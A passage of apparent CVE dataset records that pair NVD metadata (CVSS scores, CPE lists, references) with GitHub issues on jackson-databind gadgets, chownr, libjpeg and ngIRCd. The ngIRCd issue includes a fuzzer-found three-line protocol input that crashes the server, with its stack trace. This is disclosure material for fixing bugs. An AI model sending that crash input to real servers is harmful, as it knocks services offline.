"18127694-109C-4E7E-AE79-0BA351849291", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_digital_experience:20.1:*:*:*:*:*:*:*", "matchCriteriaId": "33F68878-BC19-4DB8-8A72-BD9FE3D0ACEC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_calendar_server:8.0.0.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "46059231-E7F6-4402-8119-1C7FE4ABEA96", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_contacts_server:8.0.0.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "D01A0BBC-DA0E-4AFE-83BF-4F3BA01653EC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_diameter_signaling_router:*:*:*:*:*:*:*:*", "matchCriteriaId": "526E2FE5-263F-416F-8628-6CD40B865780", "versionEndExcluding": null, "versionEndIncluding": "8.2.2", "versionStartExcluding": null, "versionStartIncluding": "8.0.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_element_manager:*:*:*:*:*:*:*:*", "matchCriteriaId": "B51F78F4-8D7E-48C2-86D1-D53A6EB348A7", "versionEndExcluding": null, "versionEndIncluding": "8.2.2", "versionStartExcluding": null, "versionStartIncluding": "8.2.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_evolved_communications_application_server:7.1:*:*:*:*:*:*:*", "matchCriteriaId": "987811D5-DA5E-493D-8709-F9231A84E5F9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_session_report_manager:*:*:*:*:*:*:*:*", "matchCriteriaId": "3E5416A1-EE58-415D-9645-B6A875EBAED2", "versionEndExcluding": null, "versionEndIncluding": "8.2.2", "versionStartExcluding": null, "versionStartIncluding": "8.2.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_session_route_manager:*:*:*:*:*:*:*:*", "matchCriteriaId": "11B0C37E-D7C7-45F2-A8D8-5A3B1B191430", "versionEndExcluding": null, "versionEndIncluding": "8.2.2", "versionStartExcluding": null, "versionStartIncluding": "8.2.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "502" ]
502
https://github.com/FasterXML/jackson-databind/issues/2704
[ "Patch", "Third Party Advisory" ]
github.com
[ "FasterXML", "jackson-databind" ]
Another gadget type(s) reported regarding class(es) of `com.sun.xml.parsers:jaxp-ri` (in shaded copy of Xalan2). See https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062 for description of the general problem. Mitre id: CVE-2020-14062 Reporter(s): XuYuanzhen from Security Team of Alibaba Cloud Fix will be included in: * 2.9.10.5 * Not considered valid CVE for Jackson 2.10.0 and later (see https://medium.com/@cowtowncoder/jackson-2-10-safe-default-typing-2d018f0ce2ba)
Block one more gadget type (jaxp-ri, CVE-2020-14062)
https://api.github.com/repos/FasterXML/jackson-databind/issues/2704/comments
0
2020-04-30T00:43:03Z
2020-07-16T17:22:25Z
https://github.com/FasterXML/jackson-databind/issues/2704
609,469,620
2,704
1,276
CVE-2020-14060
2020-06-14T21:15:09.817
FasterXML jackson-databind 2.x before 2.9.10.5 mishandles the interaction between serialization gadgets and typing, related to oadd.org.apache.xalan.lib.sql.JNDIConnectionPool (aka apache/drill).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.2, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/FasterXML/jackson-databind/issues/2688" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/07/msg00001.html" }, { "source": "cve@mitre.org", "tags": null, "url": "https://medium.com/%40cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20200702-0003/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/FasterXML/jackson-databind/issues/2688" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/07/msg00001.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://medium.com/%40cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20200702-0003/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", "matchCriteriaId": "4B92AF50-0155-471E-B5C4-1CFD95F4B7D0", "versionEndExcluding": "2.9.10.5", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.9.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:netapp:active_iq_unified_manager:*:*:*:*:*:linux:*:*", "matchCriteriaId": "9FBC1BD0-FF12-4691-8751-5F245D991989", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "7.3", "vulnerable": true }, { "criteria": "cpe:2.3:a:netapp:active_iq_unified_manager:*:*:*:*:*:windows:*:*", "matchCriteriaId": "BD075607-09B7-493E-8611-66D041FFDA62", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "7.3", "vulnerable": true }, { "criteria": "cpe:2.3:a:netapp:active_iq_unified_manager:*:*:*:*:*:vmware_vsphere:*:*", "matchCriteriaId": "0CB28AF5-5AF0-4475-A7B6-12E1795FFDCB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "9.5", "vulnerable": true }, { "criteria": "cpe:2.3:a:netapp:steelstore_cloud_integrated_storage:-:*:*:*:*:*:*:*", "matchCriteriaId": "E94F7F59-1785-493F-91A7-5F5EA5E87E4D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:oracle:agile_plm:9.3.6:*:*:*:*:*:*:*", "matchCriteriaId": "C650FEDB-E903-4C2D-AD40-282AB5F2E3C2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_digital_experience:18.1:*:*:*:*:*:*:*", "matchCriteriaId": "BBE7BF09-B89C-4590-821E-6C0587E096B5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_digital_experience:18.2:*:*:*:*:*:*:*", "matchCriteriaId": "ADAE8A71-0BCD-42D5-B38C-9B2A27CC1E6B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_digital_experience:18.3:*:*:*:*:*:*:*", "matchCriteriaId": "E7231D2D-4092-44F3-B60A-D7C9ED78AFDF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_digital_experience:19.1:*:*:*:*:*:*:*", "matchCriteriaId": "F7BDFC10-45A0-46D8-AB92-4A5E2C1C76ED", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_digital_experience:19.2:*:*:*:*:*:*:*", "matchCriteriaId": "18127694-109C-4E7E-AE79-0BA351849291", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_digital_experience:20.1:*:*:*:*:*:*:*", "matchCriteriaId": "33F68878-BC19-4DB8-8A72-BD9FE3D0ACEC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_calendar_server:8.0.0.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "46059231-E7F6-4402-8119-1C7FE4ABEA96", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_contacts_server:8.0.0.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "D01A0BBC-DA0E-4AFE-83BF-4F3BA01653EC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_diameter_signaling_router:*:*:*:*:*:*:*:*", "matchCriteriaId": "526E2FE5-263F-416F-8628-6CD40B865780", "versionEndExcluding": null, "versionEndIncluding": "8.2.2", "versionStartExcluding": null, "versionStartIncluding": "8.0.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_element_manager:*:*:*:*:*:*:*:*", "matchCriteriaId": "B51F78F4-8D7E-48C2-86D1-D53A6EB348A7", "versionEndExcluding": null, "versionEndIncluding": "8.2.2", "versionStartExcluding": null, "versionStartIncluding": "8.2.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_evolved_communications_application_server:7.1:*:*:*:*:*:*:*", "matchCriteriaId": "987811D5-DA5E-493D-8709-F9231A84E5F9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_session_report_manager:*:*:*:*:*:*:*:*", "matchCriteriaId": "3E5416A1-EE58-415D-9645-B6A875EBAED2", "versionEndExcluding": null, "versionEndIncluding": "8.2.2", "versionStartExcluding": null, "versionStartIncluding": "8.2.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_session_route_manager:*:*:*:*:*:*:*:*", "matchCriteriaId": "11B0C37E-D7C7-45F2-A8D8-5A3B1B191430", "versionEndExcluding": null, "versionEndIncluding": "8.2.2", "versionStartExcluding": null, "versionStartIncluding": "8.2.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "502" ]
502
https://github.com/FasterXML/jackson-databind/issues/2688
[ "Patch", "Third Party Advisory" ]
github.com
[ "FasterXML", "jackson-databind" ]
Another gadget type(s) reported regarding class(es) of `org.apache.drill.exec:drill-jdbc-all`. library. See https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062 for description of the general problem. Mitre id: CVE-2020-14060 Reporter(s): Topsec(tcc) from Alphalab Security Team Fix is included in: * 2.9.10.5 * Not considered valid CVE for Jackson 2.10.0 and later (see https://medium.com/@cowtowncoder/jackson-2-10-safe-default-typing-2d018f0ce2ba)
Block one more gadget type (apache-drill, CVE-2020-14060)
https://api.github.com/repos/FasterXML/jackson-databind/issues/2688/comments
0
2020-04-16T15:11:49Z
2020-08-24T22:25:58Z
https://github.com/FasterXML/jackson-databind/issues/2688
601,148,139
2,688
1,277
CVE-2017-18869
2020-06-15T15:15:09.317
A TOCTOU issue in the chownr package before 1.1.0 for Node.js 10.10 could allow a local attacker to trick it into descending into unintended directories via symlink attacks.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 1.9, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 3.4, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 2.5, "baseSeverity": "LOW", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=863985" }, { "source": "cve@mitre.org", "tags": [ "Permissions Required" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1611614" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/isaacs/chownr/issues/14" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://snyk.io/vuln/npm:chownr:20180731" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=863985" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1611614" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/isaacs/chownr/issues/14" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://snyk.io/vuln/npm:chownr:20180731" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:chownr_project:chownr:*:*:*:*:*:node.js:*:*", "matchCriteriaId": "BA4EAB96-893F-489C-B2A1-C677624250D6", "versionEndExcluding": "1.1.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "367" ]
367
https://github.com/isaacs/chownr/issues/14
[ "Third Party Advisory" ]
github.com
[ "isaacs", "chownr" ]
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=863985#10
This package appears to have a TOCTOU bug
https://api.github.com/repos/isaacs/chownr/issues/14/comments
23
2017-07-02T07:22:36Z
2019-01-04T19:26:02Z
https://github.com/isaacs/chownr/issues/14
239,994,436
14
1,278
CVE-2020-14153
2020-06-15T17:15:10.637
In IJG JPEG (aka libjpeg) from version 8 through 9c, jdhuff.c has an out-of-bounds array read for certain table pointers.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "http://www.ijg.org/files/jpegsrc.v9d.tar.gz" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugs.gentoo.org/727908" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/libjpeg-turbo/libjpeg-turbo/issues/445" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "http://www.ijg.org/files/jpegsrc.v9d.tar.gz" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugs.gentoo.org/727908" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/libjpeg-turbo/libjpeg-turbo/issues/445" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:ijg:libjpeg:*:*:*:*:*:*:*:*", "matchCriteriaId": "D8B6F197-0A40-4DA0-A5CF-BFEC3763A2F7", "versionEndExcluding": null, "versionEndIncluding": "9c", "versionStartExcluding": null, "versionStartIncluding": "8", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/libjpeg-turbo/libjpeg-turbo/issues/445
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "libjpeg-turbo", "libjpeg-turbo" ]
https://nvd.nist.gov/vuln/detail/CVE-2020-14153 https://security-tracker.debian.org/tracker/CVE-2020-14153 My best guess is that this is fixed in the following change in jpeg 9d: ``` /* Precalculate which table to use for each block */ entropy->dc_cur_tbls[blkn] = entropy->dc_derived_tbls[compptr->dc_tbl_no]; - entropy->ac_cur_tbls[blkn] = entropy->ac_derived_tbls[compptr->ac_tbl_no]; + entropy->ac_cur_tbls[blkn] = /* AC needs no table when not present */ + cinfo->lim_Se ? entropy->ac_derived_tbls[compptr->ac_tbl_no] : NULL; ``` Is this any vulnerability that is or was present in libjpeg-turbo?
Is CVE-2020-14153 present in libjpeg-turbo?
https://api.github.com/repos/libjpeg-turbo/libjpeg-turbo/issues/445/comments
2
2020-07-27T14:47:40Z
2020-07-27T17:56:12Z
https://github.com/libjpeg-turbo/libjpeg-turbo/issues/445
666,353,637
445
1,279
CVE-2020-14148
2020-06-15T18:15:15.067
The Server-Server protocol implementation in ngIRCd before 26~rc2 allows an out-of-bounds access, as demonstrated by the IRC_NJOIN() function.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ngircd/ngircd/issues/274" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ngircd/ngircd/issues/277" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ngircd/ngircd/pull/275" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ngircd/ngircd/pull/276" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/ngircd/ngircd/releases/tag/rel-26-rc2" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/06/msg00023.html" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/BJOYV5GHUFJMUVQW3TJKXZ7JPXL4W3ER/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JZRYFJIA6ZKOH7U4K5WH5OL7OKXE4N52/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ngircd/ngircd/issues/274" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ngircd/ngircd/issues/277" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ngircd/ngircd/pull/275" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ngircd/ngircd/pull/276" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/ngircd/ngircd/releases/tag/rel-26-rc2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/06/msg00023.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/BJOYV5GHUFJMUVQW3TJKXZ7JPXL4W3ER/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JZRYFJIA6ZKOH7U4K5WH5OL7OKXE4N52/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:barton:ngircd:*:*:*:*:*:*:*:*", "matchCriteriaId": "5A04351C-B842-4BD8-97EC-30534FA95055", "versionEndExcluding": null, "versionEndIncluding": "25.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:barton:ngircd:26.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "A9B51CBB-87E4-4937-93EB-CBA5074F0C68", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:31:*:*:*:*:*:*:*", "matchCriteriaId": "80F0FA5D-8D3B-4C0E-81E2-87998286AF33", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*", "matchCriteriaId": "36D96259-24BD-44E2-96D9-78CE1D41F956", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/ngircd/ngircd/issues/274
[ "Third Party Advisory" ]
github.com
[ "ngircd", "ngircd" ]
I have been fuzzing ngircd using AFL a bit, based on inputs that are used in the testsuite. AFL has found input that can be used to crash a server that has been built with `--with-iconv`. My current hypothesis is that the crash happens because the `iconv_t` context that is passed into `iconv` is invalid (i.e. has not been been initialized at all using `iconv_open`). Build flags: ``` ./configure --without-syslog --with-iconv CC=afl-clang ``` Run mode: ``` ngircd -n -f src/testsuite/ngircd-test1.conf ``` Input ([id:000039,sig:11,src:002604,time:492868267,op:havoc,rep:8-min.txt](https://github.com/ngircd/ngircd/files/4606120/id.000039.sig.11.src.002604.time.492868267.op.havoc.rep.8-min.txt)): ``` PASS pwd1 0 0 SERVER ngircd.test.server3 0 :ngircd.test.server3 NJOIN 0 ngircd.test.server ``` Stacktrace: ``` #0 0x00007ffff7e0fadd in __gconv (cd=0x12591, inbuf=inbuf@entry=0x7fffffffc078, inbufend=0x7fffffffc1bd "", outbuf=outbuf@entry=0x7fffffffc070, outbufend=0x46a060 <Encoding_Buffer+512> "", irreversible=irreversible@entry=0x7fffffffc020) at gconv.c:38 #1 0x00007ffff7e0f477 in iconv (cd=<optimized out>, inbuf=0x7fffffffc078, inbytesleft=0x7fffffffc088, outbuf=0x7fffffffc070, outbytesleft=0x7fffffffc080) at iconv.c:52 #2 0x00000000004224a9 in Convert_Message (Handle=0x12591, Message=0x7fffffffc1ae "No such channel") at conn-encoding.c:124 #3 Conn_EncodingTo (Conn=<optimized out>, Message=<optimized out>) at conn-encoding.c:186 #4 0x000000000041ecf0 in Conn_WriteStr (Idx=-1, Format=<optimized out>) at conn.c:870 #5 0x00000000004411d0 in IRC_WriteStrClientPrefix (Client=<optimized out>, Prefix=0x499120, Format=<optimized out>) at irc-write.c:150 #6 0x0000000000440fa1 in IRC_WriteErrClient (Client=0x499120, Format=<optimized out>) at irc-write.c:73 #7 0x0000000000408a16 in Channel_Join (Client=0x499120, Name=0x47d87b "0") at channel.c:261 #8 0x000000000043ff0c in IRC_NJOIN (Client=0x47d6b0, Req=0x7fffffffd270) at irc-server.c:286 #9 0x0000000000447f17 in Handle_Request (Idx=<optimized out>, Req=0x7fffffffd270) at parse.c:544 #10 Parse_Request (Idx=7, Request=<optimized out>) at parse.c:267 #11 0x000000000041e788 in Handle_Buffer (Idx=7) at conn.c:1817 #12 0x00000000004206f9 in Read_Request (Idx=7) at conn.c:1650 #13 cb_clientserver (sock=7, what=<optimized out>) at conn.c:297 #14 0x0000000000424c30 in io_docallback (fd=7, what=<optimized out>) at io.c:924 #15 io_dispatch_epoll (tv=<optimized out>) at io.c:497 #16 io_dispatch (tv=<optimized out>) at io.c:896 #17 0x000000000041defd in Conn_Handler () at conn.c:766 #18 0x0000000000405489 in main (argc=<optimized out>, 